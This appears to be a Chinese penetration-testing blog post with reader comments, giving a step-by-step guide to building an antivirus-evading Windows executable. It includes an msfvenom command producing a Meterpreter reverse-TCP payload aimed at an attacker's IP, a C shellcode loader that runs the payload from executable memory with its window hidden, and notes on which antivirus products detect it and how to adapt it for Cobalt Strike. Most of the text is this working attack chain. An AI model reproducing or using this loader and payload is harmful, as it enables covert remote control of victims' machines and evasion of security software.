MENU

使用C编译shellcode免杀上线

April 18, 2020 • 渗透测试,安全工具,免杀更新

环境安装

  1. Vs 2017
  2. windows 2008
  3. kali

实操演示

打开kali下的msf,然后生成shellcode

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f c > shellcode.c

然后将生成的文件打开,复制下图所示位置的代码

1.png

然后打开vs2017,新建项目→Visual C++ → 新建控制台应用程序

2.png

然后把shellcode复制到下面的代码里

// MSF.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。
//

#include "pch.h"
#include <iostream>
#include "stdio.h"
#include "Windows.h"

#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")                        //去除窗口
//步骤b所在桌面产生的 shellcode.c的内容;
unsigned char shellcode[] =


void main()

{
    //ShellExecute(NULL, _T("open"), _T("explorer.exe"), _T("https://www.baiud.com"), NULL, SW_SHOW);
    LPVOID Memory = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    memcpy(Memory, shellcode, sizeof(shellcode));
    ((void(*)())Memory)();
}

再把这个代码全选复制到编辑器的代码框里

3.png

然后项目里右键属性 → C/C++ → 代码生成 → 运行库

4.png

保存之后,重新生成解决方案,就会生成一个exe,这个exe运行即可上线

5.png

然后正常上线,此方法能上线大部分杀软,但是今天测试火绒不得行

6.png

查杀网也只有几个显示有毒,其中就包括360

7.png

查杀地址:http://r.virscan.org/language/zh-cn/report/dc322aacd4209d2a3366c9fb74a3442b

如果要用CS上线,在生成payload设置如下图,后面操作是一样的

8.png

希望能帮到各位大佬

祝各位大佬权限天天拿

有事儿您留言或者mail指教。

Leave a Comment

3 Comments
  1. 奈斯

  2. exploit

    大佬,生成exe的时候报错了,不知道咋解决
    e:\msf\msf\msf\msf.cpp(4): fatal error C1083: 无法打开包括文件: “pch.h”: No such file or directory

    1. @exploit写一个pch.h文件即可,无需添加内容